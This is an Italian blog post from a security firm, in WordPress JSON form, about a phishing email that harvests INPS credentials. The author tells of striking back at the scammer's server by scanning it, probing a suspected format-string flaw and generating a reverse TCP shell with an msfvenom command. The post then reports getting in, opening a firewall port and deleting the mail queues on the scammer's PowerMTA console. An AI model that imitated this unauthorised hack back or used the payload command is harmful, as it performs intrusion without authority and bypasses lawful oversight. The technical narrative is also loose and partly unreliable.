{"id":388,"date":"2020-10-01T16:01:25","date_gmt":"2020-10-01T14:01:25","guid":{"rendered":"https:\/\/lalospace.com\/?p=388"},"modified":"2020-10-29T15:05:42","modified_gmt":"2020-10-29T14:05:42","slug":"spammer-vs-lalospace","status":"publish","type":"post","link":"https:\/\/lalospace.com\/?p=388","title":{"rendered":"Scammer VS Lalospace"},"content":{"rendered":"\n

Oggi alle 6:17 AM un nostro cliente riceve la seguente mail completamente sgrammaticata proveniente da Grande <amico@prevociale.com><\/strong> Firmata Vincenzo Damato<\/em>.<\/p>\n\n\n\n

Viene allegato un xls protetto da password che richiede delle credenziali di autenticazione a servizi online dell’ inps e le invia con delle macro in POST a un sever lamp.<\/p>\n\n\n\n

\"\"
Mail di Scam<\/figcaption><\/figure>\n\n\n\n

Riceviamo come tutti decine di mail di spam\/scam all’ anno na questa volta ho personalmente voluto andare un’p\u00f2 pi\u00f9 a fondo.<\/p>\n\n\n\n

Cerco il provider che lo ospita e lo denuncio ad abuse ma non accade nulla, \u00e8 la prima volta che denuncio e non so cosa mi aspettavo di ricevere, un “bravo” un “grazie adesso chiudiamo tutto” invece non succede nulla.<\/p>\n\n\n\n

\"\"
Whois del provider che fornisce i server<\/figcaption><\/figure>\n\n\n\n

Decido di indagare, eseguo una scansione blanda sul server di provenienza e si tratta del classico server Linux, in questo caso Centos con una valanga di servizi esposti, certi sono pure abbastanza out of date.<\/p>\n\n\n\n

\"\"
Output Nmap<\/figcaption><\/figure>\n\n\n\n

Mi colpisce apache 2.2.15 abbastanza famoso per il reverse proxy exposure del 2011, mi sembra molto strano trovare in “produzione” un server cosi vecchio, recupero allora il core.c<\/strong> della versione operativa e della versione 2.2.34 e li analizzo per capire se esistono differenze sostanziali nelle risposte di una versione patchata, nel mio caso lo ho testato su una 2.2.15 patchata CVE-2017-9798 confrontato a una 2.2.34.<\/p>\n\n\n\n

Faccio un veloce deploy di laboratorio e comincio a confrontare le riposte che risultano essere competamente differenti, lo stack pointer AP_CORE_DECLARE non risulta nemmeno esserci pi\u00f9.<\/p>\n\n\n\n

Sono punto a capo o lo scammer \u00e8 bravo e maschera il versioning dei servizi o lo scanner ha sbagliato a confrontare i fingerprint, raro ma pu\u00f2 succedere. Abbandono quindi Apache.<\/p>\n\n\n\n

cbdev cmail smtpd?? A quanto pare \u00e8 un set di protocolli modulari dedicati allo scambio di internet exchange message, in sostanza un mailserver…non lo conoscevo…<\/p>\n\n\n\n

Converto subito la macchina apache di test in docker->cmail e qui comincio a perderci qualche ora, tento la via degli shortwrites, leggo e poi scrivo su indirizzi di memoria arbitrari ma non ho controllo dei buffer perch\u00e8 docker fa qualcosa di strano che non ho ancora compreso. <\/p>\n\n\n\n

Con pmap cerco di creare una mappa logica ai servizi in ascolto in modo da isolare i buffer di memoria per ogni servizio, comincio a creare un socket che che invia strighe ricorsive al servizio dispatchd, controllo il comporamento dei buffer e confronto i byte scritti(inviati) con quelli letti(ricevuti) e non coincidono.<\/p>\n\n\n\n

Sospetto un format string vulnerability in C capita che dei programmatori utilizzino printf(stringa) omettendo il %s quindi printf(“%s”,stringa) , entrambi i metodi funzionano ma se la stringa contiene un parametro di formato %x esadecimale in four-byte possiamo esaminare ripetutamente lo stack memory del processo che contiene la funzione.<\/p>\n\n\n\n

Scrivo un piccolo tool per loggare e dimensionare gli indirizzi dei buffer per il processi di dispatchd e li salvo su un file di testo. Sublime Text e trovo una serie finita e ripetuta di 0x25, 0x30, 0x38, 0x78 (sono inversi causa little-endian). Questa serie fa parte della memoria del format string stesso e questo mi permette di passare in input direttamente il formato di stringa cosi a questo punto ho 1) indirizzi e dimensione dei buffer 2) l’indirizzo di memoria da scrivere per cambiare parametro di stringa e con un reverse tcp payload posso tentare un injection.<\/p>\n\n\n\n

msfvenom  -p linux\/x86\/shell_reverse_tcp LHOST=********* LPORT=6783 -e x86\/shikata_ga_nai -b \"\\x78\\x38\\x30\\x25\\x08\\x00\\x08\" -f c<\/code><\/pre>\n\n\n\n
Fino ad ora ho lavorato in ambiente di test e ora diventa complicato poter scrivere certe cose su un blog pubblico ma dopo circa mezz’ora:<\/p>\n\n\n\n
# firewall-cmd --get-active-zones\n# firewall-cmd --zone=public --add-port=1055\/tcp --permanent<\/code><\/pre>\n\n\n\n
\"\"
Output Nmap<\/figcaption><\/figure>\n\n\n\n
Il tizio utilizza un tool di analisi molto famoso e costoso “PowerMTA” di SparkPost.<\/p>\n\n\n\n
Gli MTA attivi per scammare:<\/p>\n\n\n\n
\"\"
PowerMTA lista dei Mail Transfer Agents<\/figcaption><\/figure>\n\n\n\n
Ed a quanto pare ha una console di gestione:<\/p>\n\n\n\n
\"\"
PowerMTA command web tools<\/figcaption><\/figure>\n\n\n\n
Mi limito a dire che ho eliminato le queue su tutti i domini.<\/p>\n\n\n\n
Ma la parte pi\u00f9 divertente \u00e8 questa, il furbo ha registrato la licenza PowerMTA sotto un account skype attivo. ( aa.bb.1 )<\/p>\n\n\n\n
\"\"
PowerMTA dettagli licenza<\/figcaption><\/figure>\n\n\n\n
\"\"
Skype on Iphone<\/figcaption><\/figure>\n\n\n\n
<\/p>\n\n\n\n
Non so ancora se scrivergli o lasciar perdere fatto sta che questi stanno truffando da mesi. 14 Luglio 2020 sito Inps<\/a><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
Oggi alle 6:17 AM un nostro cliente riceve la seguente mail completamente sgrammaticata proveniente da Grande <amico@prevociale.com> Firmata Vincenzo Damato. Viene allegato un xls protetto da password che richiede delle credenziali di autenticazione a servizi online dell’ inps e le invia con delle macro in POST a un sever lamp. Riceviamo come tutti decine di mail di spam\/scam all’ anno … <\/p>\n
Read More<\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-388","post","type-post","status-publish","format-standard","hentry","category-senza-categoria","no-post-thumbnail"],"yoast_head":"\nScammer VS Lalospace - LALOSPACE<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/lalospace.com\/?p=388\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Scammer VS Lalospace - LALOSPACE\" \/>\n<meta property=\"og:description\" content=\"Oggi alle 6:17 AM un nostro cliente riceve la seguente mail completamente sgrammaticata proveniente da Grande <amico@prevociale.com> Firmata Vincenzo Damato. Viene allegato un xls protetto da password che richiede delle credenziali di autenticazione a servizi online dell’ inps e le invia con delle macro in POST a un sever lamp. Riceviamo come tutti decine di mail di spam\/scam all’ anno ... Read More\" \/>\n<meta property=\"og:url\" content=\"https:\/\/lalospace.com\/?p=388\" \/>\n<meta property=\"og:site_name\" content=\"LALOSPACE\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-01T14:01:25+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-10-29T14:05:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png\" \/>\n<meta name=\"author\" content=\"lalospace\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"lalospace\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/lalospace.com\/?p=388#article\",\"isPartOf\":{\"@id\":\"https:\/\/lalospace.com\/?p=388\"},\"author\":{\"name\":\"lalospace\",\"@id\":\"https:\/\/lalospace.com\/#\/schema\/person\/0a6048289f5b8f29b5982a642fb8bd90\"},\"headline\":\"Scammer VS Lalospace\",\"datePublished\":\"2020-10-01T14:01:25+00:00\",\"dateModified\":\"2020-10-29T14:05:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/lalospace.com\/?p=388\"},\"wordCount\":683,\"publisher\":{\"@id\":\"https:\/\/lalospace.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/lalospace.com\/?p=388#primaryimage\"},\"thumbnailUrl\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png\",\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/lalospace.com\/?p=388\",\"url\":\"https:\/\/lalospace.com\/?p=388\",\"name\":\"Scammer VS Lalospace - LALOSPACE\",\"isPartOf\":{\"@id\":\"https:\/\/lalospace.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/lalospace.com\/?p=388#primaryimage\"},\"image\":{\"@id\":\"https:\/\/lalospace.com\/?p=388#primaryimage\"},\"thumbnailUrl\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png\",\"datePublished\":\"2020-10-01T14:01:25+00:00\",\"dateModified\":\"2020-10-29T14:05:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/lalospace.com\/?p=388#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/lalospace.com\/?p=388\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/lalospace.com\/?p=388#primaryimage\",\"url\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam.png\",\"contentUrl\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam.png\",\"width\":1600,\"height\":650},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/lalospace.com\/?p=388#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/lalospace.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Scammer VS Lalospace\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/lalospace.com\/#website\",\"url\":\"https:\/\/lalospace.com\/\",\"name\":\"LALOSPACE\",\"description\":\"Reti e infrastrutture Server , Cybersecurity a Belluno\",\"publisher\":{\"@id\":\"https:\/\/lalospace.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/lalospace.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/lalospace.com\/#organization\",\"name\":\"LaloSpace\",\"url\":\"https:\/\/lalospace.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/lalospace.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/07\/logolalospace.png\",\"contentUrl\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/07\/logolalospace.png\",\"width\":500,\"height\":500,\"caption\":\"LaloSpace\"},\"image\":{\"@id\":\"https:\/\/lalospace.com\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/lalospace.com\/#\/schema\/person\/0a6048289f5b8f29b5982a642fb8bd90\",\"name\":\"lalospace\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/lalospace.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/454439e293539e2588c8f8bead321a7495960c5f22f010d27fd7f4385754fdb5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/454439e293539e2588c8f8bead321a7495960c5f22f010d27fd7f4385754fdb5?s=96&d=mm&r=g\",\"caption\":\"lalospace\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Scammer VS Lalospace - LALOSPACE","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/lalospace.com\/?p=388","og_locale":"it_IT","og_type":"article","og_title":"Scammer VS Lalospace - LALOSPACE","og_description":"Oggi alle 6:17 AM un nostro cliente riceve la seguente mail completamente sgrammaticata proveniente da Grande <amico@prevociale.com> Firmata Vincenzo Damato. Viene allegato un xls protetto da password che richiede delle credenziali di autenticazione a servizi online dell’ inps e le invia con delle macro in POST a un sever lamp. Riceviamo come tutti decine di mail di spam\/scam all’ anno ... Read More","og_url":"https:\/\/lalospace.com\/?p=388","og_site_name":"LALOSPACE","article_published_time":"2020-10-01T14:01:25+00:00","article_modified_time":"2020-10-29T14:05:42+00:00","og_image":[{"url":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png","type":"","width":"","height":""}],"author":"lalospace","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"lalospace","Tempo di lettura stimato":"4 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/lalospace.com\/?p=388#article","isPartOf":{"@id":"https:\/\/lalospace.com\/?p=388"},"author":{"name":"lalospace","@id":"https:\/\/lalospace.com\/#\/schema\/person\/0a6048289f5b8f29b5982a642fb8bd90"},"headline":"Scammer VS Lalospace","datePublished":"2020-10-01T14:01:25+00:00","dateModified":"2020-10-29T14:05:42+00:00","mainEntityOfPage":{"@id":"https:\/\/lalospace.com\/?p=388"},"wordCount":683,"publisher":{"@id":"https:\/\/lalospace.com\/#organization"},"image":{"@id":"https:\/\/lalospace.com\/?p=388#primaryimage"},"thumbnailUrl":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png","inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/lalospace.com\/?p=388","url":"https:\/\/lalospace.com\/?p=388","name":"Scammer VS Lalospace - LALOSPACE","isPartOf":{"@id":"https:\/\/lalospace.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/lalospace.com\/?p=388#primaryimage"},"image":{"@id":"https:\/\/lalospace.com\/?p=388#primaryimage"},"thumbnailUrl":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png","datePublished":"2020-10-01T14:01:25+00:00","dateModified":"2020-10-29T14:05:42+00:00","breadcrumb":{"@id":"https:\/\/lalospace.com\/?p=388#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/lalospace.com\/?p=388"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/lalospace.com\/?p=388#primaryimage","url":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam.png","contentUrl":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam.png","width":1600,"height":650},{"@type":"BreadcrumbList","@id":"https:\/\/lalospace.com\/?p=388#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/lalospace.com\/"},{"@type":"ListItem","position":2,"name":"Scammer VS Lalospace"}]},{"@type":"WebSite","@id":"https:\/\/lalospace.com\/#website","url":"https:\/\/lalospace.com\/","name":"LALOSPACE","description":"Reti e infrastrutture Server , Cybersecurity a Belluno","publisher":{"@id":"https:\/\/lalospace.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/lalospace.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/lalospace.com\/#organization","name":"LaloSpace","url":"https:\/\/lalospace.com\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/lalospace.com\/#\/schema\/logo\/image\/","url":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/07\/logolalospace.png","contentUrl":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/07\/logolalospace.png","width":500,"height":500,"caption":"LaloSpace"},"image":{"@id":"https:\/\/lalospace.com\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/lalospace.com\/#\/schema\/person\/0a6048289f5b8f29b5982a642fb8bd90","name":"lalospace","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/lalospace.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/454439e293539e2588c8f8bead321a7495960c5f22f010d27fd7f4385754fdb5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/454439e293539e2588c8f8bead321a7495960c5f22f010d27fd7f4385754fdb5?s=96&d=mm&r=g","caption":"lalospace"}}]}},"_links":{"self":[{"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/posts\/388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lalospace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=388"}],"version-history":[{"count":14,"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/posts\/388\/revisions"}],"predecessor-version":[{"id":714,"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/posts\/388\/revisions\/714"}],"wp:attachment":[{"href":"https:\/\/lalospace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lalospace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lalospace.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}